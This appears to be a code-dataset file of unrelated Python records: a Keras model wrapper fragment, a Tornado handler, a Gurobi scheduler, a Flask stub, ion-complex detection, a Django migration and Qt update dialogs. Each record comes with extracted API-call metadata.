:param x: A symbolic representation of the network input.
:return: A symbolic representation of the probs
"""
return self.model(x)
def get_layer_names(self):
"""
:return: Names of all the layers kept by Keras
"""
layer_names = [x.name for x in self.model.layers]
return layer_names
def fprop(self, x):
"""
Exposes all the layers of the model returned by get_layer_names.
:param x: A symbolic representation of the network input
:return: A dictionary mapping layer names to the symbolic
representation of their output.
"""
from tensorflow.keras.models import Model as KerasModel
if self.keras_model is None:
# Get the input layer
new_input = self.model.get_input_at(0)
# Make a new model that returns each of the layers as output
out_layers = [x_layer.output for x_layer in self.model.layers]
self.keras_model = KerasModel(new_input, out_layers)
# and get the outputs for that model on the input x
outputs = self.keras_model(x)
# Keras only returns a list for outputs of length >= 1, if the model
# is only one layer, wrap a list
if len(self.model.layers) == 1:
outputs = [outputs]
# compute the dict to return
fprop_dict = dict(zip(self.get_layer_names(), outputs))
return fprop_dict
def get_layer(self, x, layer):
"""
Expose the hidden features of a model given a layer name.
:param x: A symbolic representation of the network input
:param layer: The name of the hidden layer to return features at.
:return: A symbolic representation of the hidden features
:raise: NoSuchLayerError if `layer` is not in the model.
"""
# Return the symbolic representation for this layer.
output = self.fprop(x)
try:
requested = output[layer]
except KeyError:
raise NoSuchLayerError()
return requested
| [
"tensorflow.reduce_min",
"tensorflow.executing_eagerly",
"tensorflow.keras.models.Model",
"tensorflow.reduce_max",
"tensorflow.control_dependencies",
"tensorflow.nn.softmax",
"warnings.warn",
"tensorflow.identity",
"tensorflow.cast",
"tensorflow.log",
"tensorflow.get_collection"
] | [((1815, 2306), 'warnings.warn', 'warnings.warn', (['"""Model.__call__ is deprecated. The call is ambiguous as to whether the output should be logits or probabilities, and getting the wrong one can cause serious problems. The output actually is probabilities, which are a very dangerous thing to use as part of any interface for cleverhans, because softmax probabilities are prone to gradient masking.On or after 2019-04-24, this method will change to raise an exception explaining why Model.__call__ should not be used."""'], {}), "(\n 'Model.__call__ is deprecated. The call is ambiguous as to whether the output should be logits or probabilities, and getting the wrong one can cause serious problems. The output actually is probabilities, which are a very dangerous thing to use as part of any interface for cleverhans, because softmax probabilities are prone to gradient masking.On or after 2019-04-24, this method will change to raise an exception explaining why Model.__call__ should not be used.'\n )\n", (1828, 2306), False, 'import warnings\n'), ((5313, 5382), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', "(self.scope + '/')"], {}), "(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + '/')\n", (5330, 5382), True, 'import tensorflow as tf\n'), ((10660, 10672), 'tensorflow.log', 'tf.log', (['prob'], {}), '(prob)\n', (10666, 10672), True, 'import tensorflow as tf\n'), ((3782, 3803), 'tensorflow.reduce_min', 'tf.reduce_min', (['output'], {}), '(output)\n', (3795, 3803), True, 'import tensorflow as tf\n'), ((3827, 3848), 'tensorflow.reduce_max', 'tf.reduce_max', (['output'], {}), '(output)\n', (3840, 3848), True, 'import tensorflow as tf\n'), ((5044, 5066), 'tensorflow.executing_eagerly', 'tf.executing_eagerly', ([], {}), '()\n', (5064, 5066), True, 'import tensorflow as tf\n'), ((5495, 5564), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.TRAINABLE_VARIABLES', "(self.scope + '/')"], {}), "(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + '/')\n", (5512, 5564), True, 'import tensorflow as tf\n'), ((9629, 9766), 'warnings.warn', 'warnings.warn', (['"""Please update your version to keras >= 2.1.3; support for earlier keras versions will be dropped on 2018-07-22"""'], {}), "(\n 'Please update your version to keras >= 2.1.3; support for earlier keras versions will be dropped on 2018-07-22'\n )\n", (9642, 9766), False, 'import warnings\n'), ((11726, 11759), 'tensorflow.keras.models.Model', 'KerasModel', (['new_input', 'out_layers'], {}), '(new_input, out_layers)\n', (11736, 11759), True, 'from tensorflow.keras.models import Model as KerasModel\n'), ((4075, 4107), 'tensorflow.control_dependencies', 'tf.control_dependencies', (['asserts'], {}), '(asserts)\n', (4098, 4107), True, 'import tensorflow as tf\n'), ((4134, 4153), 'tensorflow.identity', 'tf.identity', (['output'], {}), '(output)\n', (4145, 4153), True, 'import tensorflow as tf\n'), ((4232, 4270), 'tensorflow.nn.softmax', 'tf.nn.softmax', ([], {'logits': 'd[self.O_LOGITS]'}), '(logits=d[self.O_LOGITS])\n', (4245, 4270), True, 'import tensorflow as tf\n'), ((3929, 3957), 'tensorflow.cast', 'tf.cast', (['(0.0)', 'min_prob.dtype'], {}), '(0.0, min_prob.dtype)\n', (3936, 3957), True, 'import tensorflow as tf\n'), ((4013, 4041), 'tensorflow.cast', 'tf.cast', (['(1.0)', 'min_prob.dtype'], {}), '(1.0, min_prob.dtype)\n', (4020, 4041), True, 'import tensorflow as tf\n')] |
from .db_handler import cursor
from tornado import concurrent
import tornado.web
executor = concurrent.futures.ThreadPoolExecutor(8)
def start_task(arg):
print("The Task has started") # Async task
return True
def stop_task(arg):
print("The Task has stopped") # Async task
return True
class HandlerStart(tornado.web.RequestHandler):
def post(self, username):
cursor.execute("SELECT * FROM users")
users = cursor.fetchall()
user_names = []
if users:
keys = ("id", "name", "email")
list_of_users = [dict(zip(keys, values)) for values in users]
for user in list_of_users:
user_names.append(user['name'])
if username in set(user_names):
flag = True
else:
flag = False
else:
flag = False
if flag:
executor.submit(start_task, username)
response = "started"
else:
response = "User Doesn't exist"
self.write('request accepted |' + str(username) + ' | ' + str(response))
class HandlerStop(tornado.web.RequestHandler):
def post(self, username):
cursor.execute("SELECT * FROM users")
users = cursor.fetchall()
user_names = []
if users:
keys = ("id", "name", "email")
list_of_users = [dict(zip(keys, values)) for values in users]
for user in list_of_users:
user_names.append(user['name'])
if username in set(user_names):
flag = True
else:
flag = False
else:
flag = False
if flag:
executor.submit(stop_task, username)
response = "stopped"
else:
response = "User Doesn't exist"
self.write('request accepted |' + str(username) + ' | ' + str(response))
| [
"tornado.concurrent.futures.ThreadPoolExecutor"
] | [((92, 132), 'tornado.concurrent.futures.ThreadPoolExecutor', 'concurrent.futures.ThreadPoolExecutor', (['(8)'], {}), '(8)\n', (129, 132), False, 'from tornado import concurrent\n')] |
import gurobipy as gp
from gurobipy import GRB
from scheduler.utils import *
import csv
W = {}
days = ["MONDAY", "TUESDAY", "WEDNESDAY", "THURSDAY", "FRIDAY"]
departments = ["CMPE"]
def create_W_matrix():
global W
allAvailableSlots = get_all_available_slots()
for availableSlot in allAvailableSlots:
for slot in availableSlot.slots:
if slot is None:
continue
if availableSlot.instructor in W:
W[availableSlot.instructor].append(TimeSlot(slot))
else:
W[availableSlot.instructor] = [TimeSlot(slot)]
def does_intersect(slot1, slot2):
if slot1.day != slot2.day:
return False
if slot1.slot == slot2.slot:
return True
if slot1.length == 2 and slot1.slot + 1 == slot2.slot:
return True
if slot2.length == 2 and slot2.slot + 1 == slot1.slot:
return True
return False
def solve():
m = gp.Model('Scheduling')
create_W_matrix()
X = m.addVars(allInstructors, allCourses, allSlots, allClassrooms, name="X", vtype=GRB.BINARY)
constr1 = m.addConstrs(
gp.quicksum(X[f, c, s, r] for c in allCourses for r in allClassrooms) <= 1 for f in allInstructors for s in
allSlots)
constr2 = m.addConstrs(
(gp.quicksum(X[f, c, s, r] for f in allInstructors for c in allCourses) <= 1 for s in allSlots for r in
allClassrooms))
constr3 = m.addConstrs((gp.quicksum(
X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots) <= gp.quicksum(
X[f, c, s, r] * r.capacity for f in allInstructors for s in allSlots))
for c in allCourses for r in allClassrooms)
constr4 = m.addConstrs(
gp.quicksum(X[f, c, s, r] for c in allCourses for r in allClassrooms) == 0 for f in allInstructors for s in
allSlots if f.id in W and s not in W[f.id])
constr5 = m.addConstrs(gp.quicksum(
X[f, c, s, r] * s.length for s in allSlots for r in allClassrooms for f in allInstructors) == c.hours for c in
allCourses)
constr6 = m.addConstrs(
gp.quicksum(X[f, c, s, r] for s in allSlots for r in allClassrooms) == 0 for f in allInstructors for c in
allCourses if c.id not in f.courses)
constr7 = m.addConstrs(
gp.quicksum(X[f, c, rs, r] for rs in getRelatedSlots(s) for r in allClassrooms for c in allCourses) <= 1
for f in allInstructors for s in allSlots)
constr8 = m.addConstrs(
gp.quicksum(X[f, c, s, r] for r in allClassrooms for f in allInstructors for s in allSlots if s.day == d) <= 1
for d in days for c in allCourses)
# Dersleri 2 + 1 seklinde ayirabilmek icin.
constr9 = m.addConstrs(
gp.quicksum(X[f, c, s, r] for r in allClassrooms for s in allSlots) <= 2 for f in allInstructors for c in
allCourses
)
constr11 = m.addConstrs(
gp.quicksum(X[f, c, rs, r] for rs in getRelatedSlots(s) for f in allInstructors for c in allCourses) <= 1
for r in allClassrooms for s in allSlots)
# constr10 = m.addConstrs(
# gp.quicksum(X[f, c, ss, r] for c in allCourses if 100 * Class <= c.code < 100 * (Class + 1) and c.department == d for f in allInstructors for r in allClassrooms for ss in allSlots if does_intersect(ss, s)) <= 1 for Class in range(1, 5) for d in departments for s in allSlots
# )
obj = gp.quicksum(
X[f, c, s, r] for f in allInstructors for s in allSlots for c in allCourses for r in allClassrooms)
m.setObjective(obj, GRB.MAXIMIZE)
m.optimize()
solution = m.getAttr('X', X)
for instructor, course, slot, classroom in X.keys():
if solution[instructor, course, slot, classroom] > 0.5:
with open('results/{}.csv'.format(classroom.code), 'a+') as f:
writer = csv.writer(f)
writer.writerow(
[slot.day, slot.slot, slot.length, instructor.full_name, course.department, course.code])
with open('results/{}.csv'.format(instructor.full_name), 'a+') as f:
writer = csv.writer(f)
writer.writerow([slot.day, slot.slot, slot.length, classroom.code, course.department, course.code])
| [
"gurobipy.quicksum",
"csv.writer",
"gurobipy.Model"
] | [((979, 1001), 'gurobipy.Model', 'gp.Model', (['"""Scheduling"""'], {}), "('Scheduling')\n", (987, 1001), True, 'import gurobipy as gp\n'), ((3503, 3618), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for f in allInstructors for s in allSlots for c in\n allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for f in allInstructors for s in allSlots for c in\n allCourses for r in allClassrooms)\n', (3514, 3618), True, 'import gurobipy as gp\n'), ((1167, 1236), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for c in allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for c in allCourses for r in allClassrooms)\n', (1178, 1236), True, 'import gurobipy as gp\n'), ((1335, 1405), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for f in allInstructors for c in allCourses)'], {}), '(X[f, c, s, r] for f in allInstructors for c in allCourses)\n', (1346, 1405), True, 'import gurobipy as gp\n'), ((1495, 1573), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots)'], {}), '(X[f, c, s, r] * c.quota for f in allInstructors for s in allSlots)\n', (1506, 1573), True, 'import gurobipy as gp\n'), ((1587, 1672), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * r.capacity for f in allInstructors for s in allSlots)'], {}), '(X[f, c, s, r] * r.capacity for f in allInstructors for s in\n allSlots)\n', (1598, 1672), True, 'import gurobipy as gp\n'), ((1792, 1861), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for c in allCourses for r in allClassrooms)'], {}), '(X[f, c, s, r] for c in allCourses for r in allClassrooms)\n', (1803, 1861), True, 'import gurobipy as gp\n'), ((1983, 2089), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] * s.length for s in allSlots for r in allClassrooms for f in\n allInstructors)'], {}), '(X[f, c, s, r] * s.length for s in allSlots for r in\n allClassrooms for f in allInstructors)\n', (1994, 2089), True, 'import gurobipy as gp\n'), ((2196, 2263), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for s in allSlots for r in allClassrooms)'], {}), '(X[f, c, s, r] for s in allSlots for r in allClassrooms)\n', (2207, 2263), True, 'import gurobipy as gp\n'), ((2585, 2694), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for r in allClassrooms for f in allInstructors for s in\n allSlots if s.day == d)'], {}), '(X[f, c, s, r] for r in allClassrooms for f in allInstructors for\n s in allSlots if s.day == d)\n', (2596, 2694), True, 'import gurobipy as gp\n'), ((2829, 2896), 'gurobipy.quicksum', 'gp.quicksum', (['(X[f, c, s, r] for r in allClassrooms for s in allSlots)'], {}), '(X[f, c, s, r] for r in allClassrooms for s in allSlots)\n', (2840, 2896), True, 'import gurobipy as gp\n'), ((3941, 3954), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (3951, 3954), False, 'import csv\n'), ((4208, 4221), 'csv.writer', 'csv.writer', (['f'], {}), '(f)\n', (4218, 4221), False, 'import csv\n')] |
import sys,os
import time
import datetime
import random
import re
import json
import requests
from flask import Flask, jsonify
from flasgger import Swagger # pip install flasgger
from flasgger import swag_from
from flask import request
from api_helper import GretNet_API_Helper
LOCAL_PATH = os.path.abspath(os.path.dirname(__file__))+"/"
sys.path.insert(0,LOCAL_PATH)
sys.path.insert(0,LOCAL_PATH+"../")
#0v1# JC Apr 8, 2021 Base setup
#Helper=GretNet_API_Helper()
## OpenAPI
#
#/crawl_domain
def handle_crawl_domain_request(): #*args,**kwargs):
"""Submit a domain to crawl
---
post:
summary: Handle submit domain to crawl requests
consumes:
- application/json
parameters:
- in: body
name: meta
description: Domain to crawl
schema:
type: object
properties:
url:
type: string
responses:
200:
description: Post accepted and processed.
"""
try:
the_json=request.json
except: the_json={}
if the_json:
Helper.cache_request('crawl_domain',the_json, id='')
try: print (str(request.json))
except: pass
result={}
result['status_code']=200
return jsonify(result)
#TBD: add node or relation, standard search
def dev1():
return
if __name__=='__main__':
branches=['dev1']
for b in branches:
globals()[b]()
"""
"""
"""
"""
| [
"os.path.dirname",
"sys.path.insert",
"flask.jsonify"
] | [((349, 379), 'sys.path.insert', 'sys.path.insert', (['(0)', 'LOCAL_PATH'], {}), '(0, LOCAL_PATH)\n', (364, 379), False, 'import sys, os\n'), ((379, 417), 'sys.path.insert', 'sys.path.insert', (['(0)', "(LOCAL_PATH + '../')"], {}), "(0, LOCAL_PATH + '../')\n", (394, 417), False, 'import sys, os\n'), ((1350, 1365), 'flask.jsonify', 'jsonify', (['result'], {}), '(result)\n', (1357, 1365), False, 'from flask import Flask, jsonify\n'), ((317, 342), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (332, 342), False, 'import sys, os\n')] |
"""
paw_structure.ion
-----------------
Ion complex detection using geometric :ref:`algorithm<Control_ION_algorithm>`.
Main routine is :func:`.ion_find_parallel`.
Dependencies:
:py:mod:`functools`
:py:mod:`miniutils`
:py:mod:`numpy`
:py:mod:`pandas`
:mod:`.neighbor`
:mod:`.utility`
:class:`.Snap`
.. autosummary::
ion_find_parallel
ion_load
ion_save
ion_single
"""
import numpy as np
import pandas as pd
from functools import partial
import miniutils.progress_bar as progress
# MODULES WITHIN PROJECT
from . import neighbor
from . import utility
from .tra import Snap
########################################################################################################################
# FIND ION COMPLEX FOR A SINGLE SNAPSHOT
########################################################################################################################
# INPUT
# class Snap snap snapshot containing all information
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 cutoff distance for first neighbor search
# float cut2 cutoff distance for second neighbor search
#####
# OUTPUT
# pandas DataFrame contains the whole complex centered around id1
########################################################################################################################
def ion_single(snap, id1, id2, id3, cut1, cut2):
"""
Find ion complex of a single snapshot of atomic positions.
Args:
snap (:class:`.Snap`): single snapshot containing the atomic information
id1 (str): identifier for atom used as center (e.g. 'MN')
id2 (str): identifier for atoms as possible first neighbors (e.g. 'O\_')
id3 (str): identifier for atoms as possible neighbors of first neighbors (e.g. 'H\_')
cut1 (float): cutoff distance for first neighbor search
cut2 (float): cutoff distance for second neighbor search
Returns:
:class:`.Snap`: snapshot containing an ion complex
Todo:
Implement possibility for more atoms of type id1 or allow selection by name.
"""
# check if only one atom is selected as ion
if len(snap.atoms[snap.atoms['id'] == id1]) != 1:
utility.err('ion_single', 0, [len(snap.atoms[snap.atoms['id'] == id1])])
# check if all three are different species
if id1 == id2 or id2 == id3 or id1 == id3:
utility.err('ion_single', 1, [id1, id2, id3])
# search first neighbors
next1 = neighbor.neighbor_name(snap, id1, id2, cut1)
# extract name lists
id1_list = [atom[0] for atom in next1]
id2_list = [y for x in [atom[1:] for atom in next1] for y in x]
# search second neighbors
next2 = neighbor.neighbor_name(snap, id2, id3, cut2, names=id2_list)
# extract name list
id3_list = [y for x in [atom[1:] for atom in next2] for y in x]
# extract correct atom information
id1_list = snap.atoms.loc[snap.atoms['name'].isin(id1_list)]
id2_list = snap.atoms.loc[snap.atoms['name'].isin(id2_list)]
id3_list = snap.atoms.loc[snap.atoms['name'].isin(id3_list)]
comp = pd.concat([id1_list, id2_list, id3_list])
return Snap(snap.iter, snap.time, snap.cell, None, None, dataframe=comp)
########################################################################################################################
# SAVE INFORMATION FROM ion_find TO FILE <root>.ext FOR LATER ANALYSIS
# TODO: check if snapshots is empty
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 cutoff distance for first neighbor search
# float cut2 cutoff distance for second neighbor search
# str ext (optional) extension for the saved file: name = root + ext
########################################################################################################################
def ion_save(root, snapshots, id1, id2, id3, cut1, cut2, ext='.ion'):
"""
Save results to file :ref:`Output_ion`.
Args:
root (str): root name for saving file
snapshots (list[:class:`.Snap`]): list of snapshots containing an ion complex
id1 (str): identifier for atom used as center (e.g. 'MN')
id2 (str): identifier for atoms as possible first neighbors (e.g. 'O\_')
id3 (str): identifier for atoms as possible neighbors of first neighbors (e.g. 'H\_')
cut1 (float): cutoff distance for first neighbor search
cut2 (float): cutoff distance for second neighbor search
ext (str, optional): default ".ion" - extension for the saved file: name = root + ext
Todo:
Check if snapshots is empty.
"""
# open file
path = root + ext
try:
f = open(path, 'w')
except IOError:
utility.err_file('ion_save', path)
# write header
f.write(utility.write_header())
f.write("ION COMPLEXES\n")
f.write("%-14s%14.8f\n" % ("T1", snapshots[0].time))
f.write("%-14s%14.8f\n" % ("T2", snapshots[-1].time))
f.write("%-14s%14d\n" % ("SNAPSHOTS", len(snapshots)))
f.write("%-14s%14s\n" % ("ID1", id1))
f.write("%-14s%14s\n" % ("ID2", id2))
f.write("%-14s%14s\n" % ("ID3", id3))
f.write("%-14s%14.8f\n" % ("CUT1", cut1))
f.write("%-14s%14.8f\n" % ("CUT2", cut2))
f.write("%-14s\n" % ("UNIT CELL"))
np.savetxt(f, snapshots[0].cell, fmt="%14.8f")
# write structure information
for i in range(len(snapshots)):
f.write("-" * 84 + "\n")
f.write("%-14s%-14.8f%-14s%-14d%-14s%-14d\n" %
("TIME", snapshots[i].time, "ITERATION", snapshots[i].iter, "ATOMS", len(snapshots[i].atoms)))
f.write("%-14s%-14s%-14s%14s%14s%14s\n" % ('NAME', 'ID', 'INDEX', 'X', 'Y', 'Z'))
np.savetxt(f, snapshots[i].atoms, fmt="%-14s%-14s%-14d%14.8f%14.8f%14.8f")
f.close()
return
########################################################################################################################
# LOAD INFORMATION PREVIOUSLY SAVED BY ion_save()
# WARNING: READING IS LINE SENSITIVE! ONLY USE ON UNCHANGED FILES WRITTEN BY ion_save()
########################################################################################################################
# INPUT
# str root root name for the file to be loaded
# str ext (optional) extension for the file to be loaded: name = root + ext
#####
# OUTPUT
# list class Snap snapshots list of all information
########################################################################################################################
def ion_load(root, ext='.ion'):
"""
Load information from the :ref:`Output_ion` file previously created by :func:`.ion_save`.
Args:
root (str): root name for the file to be loaded
ext (str, optional): default ".ion" - extension for the file to be loaded: name = root + ext
Returns:
list[:class:`.Snap`]: list of snapshots containing an ion complex
Note:
Reading is line sensitive. Do not alter the output file before loading.
"""
path = root + ext
try:
f = open(path, 'r')
except IOError:
utility.err_file('ion_load', path)
text = f.readlines() # read text as lines
for i in range(len(text)):
text[i] = text[i].split() # split each line into list with strings as elements
snapshots = [] # storage list
for i in range(len(text)):
if len(text[i]) > 1:
if text[i][0] == 'UNIT':
cell = np.array(text[i+1:i+4], dtype=float) # get unit cell
if text[i][0] == "TIME": # search for trigger of new snapshot
iter = int(text[i][3])
time = float(text[i][1])
n_atoms = int(text[i][5])
test = np.array(text[i + 2:i + 2 + n_atoms])
atoms = {}
atoms['name'] = test[:, 0]
atoms['id'] = test[:, 1]
atoms['index'] = np.array(test[:, 2], dtype=int)
df = pd.DataFrame(data=atoms)
# save information as class Snap
snapshots.append(Snap(iter, time, cell, np.array(test[:, 3:6], dtype=np.float64), df))
return snapshots
########################################################################################################################
# FIND ION COMPLEXES IN MULTIPLE SNAPSHOTS
# WARNING: NOT IN USE BECAUSE NO PARALLEL COMPUTING
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 (optional) cutoff distance for first neighbor search
# float cut2 (optional) cutoff distance for second neighbor search
#####
# OUTPUT
# list class Snap complex list with all ion complexes found
########################################################################################################################
# def ion_find(root, snapshots, id1, id2, id3, cut1=3.0, cut2=1.4):
# complex = []
# # loop through different snapshots
# for snap in snapshots:
# # get complex information
# comp = ion_single(snap, id1, id2, id3, cut1, cut2)
# # append Snap object for data storage
# complex.append(Snap(snap.iter, snap.time, snap.cell, None, None, dataframe=comp))
# # save information to file
# ion_save(root, complex, id1, id2, id3, cut1, cut2)
# return complex
########################################################################################################################
# ROUTINE TO FIND ION COMPLEXES FOR MULTIPLE SNAPSHOTS
# PARALLEL VERSION OF ion_find() WITH PROGRESS BAR IN CONSOLE
########################################################################################################################
# INPUT
# str root root name for saving file
# list class Snap snapshots list with information to be saved
# str id1 identifier for atom used as center (e.g. 'MN'); only one allowed to be in snap
# str id2 identifier for atoms as possible first neighbors (e.g. 'O_')
# str id3 identifier for atoms as possible neighbors of first neighbors (e.g. 'H_')
# float cut1 (optional) cutoff distance for first neighbor search
# float cut2 (optional) cutoff distance for second neighbor search
#####
# OUTPUT
# list class Snap ion_comp list of ion complexes found
########################################################################################################################
def ion_find_parallel(root, snapshots, id1, id2, id3, cut1, cut2):
"""
Find ion complexes for multiple snapshots of atomic configurations.
Args:
root (str): root name of the files
snapshots (list[:class:`.Snap`]): list of snapshots containing the atomic information
id1 (str): identifier for atom used as center (e.g. 'MN')
id2 (str): identifier for atoms as possible first neighbors (e.g. 'O\_')
id3 (str): identifier for atoms as possible neighbors of first neighbors (e.g. 'H\_')
cut1 (float): cutoff distance for first neighbor search
cut2 (float): cutoff distance for second neighbor search
Returns:
list[:class:`.Snap`]: list of snapshots containing an ion complex
Parallelization based on :py:mod:`multiprocessing`.
Note:
Only one atom of type :data:`id1` allowed to be in a snapshot at the moment.
"""
print("ION COMPLEX DETECTION IN PROGRESS")
# set other arguments (necessary for parallel computing)
multi_one = partial(ion_single, id1=id1, id2=id2, id3=id3, cut1=cut1, cut2=cut2)
# run data extraction
ion_comp = progress.parallel_progbar(multi_one, snapshots)
# create output file
ion_save(root, ion_comp, id1, id2, id3, cut1, cut2)
print("ION COMPLEX DETECTION FINISHED")
return ion_comp
| [
"pandas.DataFrame",
"numpy.array",
"functools.partial",
"numpy.savetxt",
"miniutils.progress_bar.parallel_progbar",
"pandas.concat"
] | [((3330, 3371), 'pandas.concat', 'pd.concat', (['[id1_list, id2_list, id3_list]'], {}), '([id1_list, id2_list, id3_list])\n', (3339, 3371), True, 'import pandas as pd\n'), ((6036, 6082), 'numpy.savetxt', 'np.savetxt', (['f', 'snapshots[0].cell'], {'fmt': '"""%14.8f"""'}), "(f, snapshots[0].cell, fmt='%14.8f')\n", (6046, 6082), True, 'import numpy as np\n'), ((12748, 12816), 'functools.partial', 'partial', (['ion_single'], {'id1': 'id1', 'id2': 'id2', 'id3': 'id3', 'cut1': 'cut1', 'cut2': 'cut2'}), '(ion_single, id1=id1, id2=id2, id3=id3, cut1=cut1, cut2=cut2)\n', (12755, 12816), False, 'from functools import partial\n'), ((12858, 12905), 'miniutils.progress_bar.parallel_progbar', 'progress.parallel_progbar', (['multi_one', 'snapshots'], {}), '(multi_one, snapshots)\n', (12883, 12905), True, 'import miniutils.progress_bar as progress\n'), ((6450, 6524), 'numpy.savetxt', 'np.savetxt', (['f', 'snapshots[i].atoms'], {'fmt': '"""%-14s%-14s%-14d%14.8f%14.8f%14.8f"""'}), "(f, snapshots[i].atoms, fmt='%-14s%-14s%-14d%14.8f%14.8f%14.8f')\n", (6460, 6524), True, 'import numpy as np\n'), ((8219, 8259), 'numpy.array', 'np.array', (['text[i + 1:i + 4]'], {'dtype': 'float'}), '(text[i + 1:i + 4], dtype=float)\n', (8227, 8259), True, 'import numpy as np\n'), ((8492, 8529), 'numpy.array', 'np.array', (['text[i + 2:i + 2 + n_atoms]'], {}), '(text[i + 2:i + 2 + n_atoms])\n', (8500, 8529), True, 'import numpy as np\n'), ((8674, 8705), 'numpy.array', 'np.array', (['test[:, 2]'], {'dtype': 'int'}), '(test[:, 2], dtype=int)\n', (8682, 8705), True, 'import numpy as np\n'), ((8727, 8751), 'pandas.DataFrame', 'pd.DataFrame', ([], {'data': 'atoms'}), '(data=atoms)\n', (8739, 8751), True, 'import pandas as pd\n'), ((8857, 8897), 'numpy.array', 'np.array', (['test[:, 3:6]'], {'dtype': 'np.float64'}), '(test[:, 3:6], dtype=np.float64)\n', (8865, 8897), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('facilities', '0001_auto_20160328_1426'),
]
operations = [
migrations.AddField(
model_name='facilityunit',
name='license_number',
field=models.CharField(max_length=100, null=True, blank=True),
),
migrations.AlterField(
model_name='facilitytype',
name='sub_division',
field=models.CharField(help_text=b'Parent of the facility type e.g sub-district hospitals are under Hospitals.', max_length=100, null=True, blank=True),
),
]
| [
"django.db.models.CharField"
] | [((367, 422), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)'}), '(max_length=100, null=True, blank=True)\n', (383, 422), False, 'from django.db import migrations, models\n'), ((556, 711), 'django.db.models.CharField', 'models.CharField', ([], {'help_text': "b'Parent of the facility type e.g sub-district hospitals are under Hospitals.'", 'max_length': '(100)', 'null': '(True)', 'blank': '(True)'}), "(help_text=\n b'Parent of the facility type e.g sub-district hospitals are under Hospitals.'\n , max_length=100, null=True, blank=True)\n", (572, 711), False, 'from django.db import migrations, models\n')] |
# Copyright (c) 2015-2016 <NAME> <<EMAIL>>
# See LICENSE file for copyright information.
import sys
if 'PySide6' in sys.modules:
from PySide6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PyQt6' in sys.modules:
from PyQt6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PySide2' in sys.modules:
from PySide2.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
elif 'PyQt5' in sys.modules:
from PyQt5.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
else:
if 'PySide' in sys.modules:
from PySide.QtGui import QMessageBox, QLabel, QTextEdit
elif 'PyQt4' in sys.modules:
from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit
else:
raise ImportError("cannot determine Qt bindings: import desired Qt module first")
_exec_attr = 'exec_'
QMessageBox.ButtonRole.YesRole = QMessageBox.YesRole
QMessageBox.ButtonRole.NoRole = QMessageBox.NoRole
QMessageBox.ButtonRole.RejectRole = QMessageBox.RejectRole
QMessageBox.StandardButton.Ok = QMessageBox.Ok
QMessageBox.StandardButton.Yes = QMessageBox.Yes
QMessageBox.StandardButton.No = QMessageBox.No
def ask_for_autocheck(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Question)
dialog.setWindowTitle(dialog.tr("Check for updates automatically?"))
dialog.setText(dialog.tr("Should {} automatically check for updates?").format(pysparkle.appname))
dialog.setInformativeText(dialog.tr("You can always check for updates manually from the menu."))
dialog.setStandardButtons(QMessageBox.StandardButton.Yes | QMessageBox.StandardButton.No)
result = getattr(dialog, _exec_attr)()
return result == QMessageBox.StandardButton.Yes
def update_error(msg=None):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Critical)
dialog.setWindowTitle(dialog.tr("Update Error!"))
dialog.setText(dialog.tr("An error occurred in retrieving update information; "
"are you connected to the internet? Please try again later."))
if msg is not None:
dialog.setDetailedText(msg)
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_info(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Warning)
dialog.setWindowTitle(dialog.tr("No update information!"))
dialog.setText(dialog.tr("There is no update information for {}.\n\n"
"Maybe the software is not supported for your operating system...")
.format(pysparkle.appname))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_update(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("You're up to date!"))
dialog.setText(dialog.tr("{} {} is currently the newest version available.")
.format(pysparkle.appname, pysparkle.appver))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
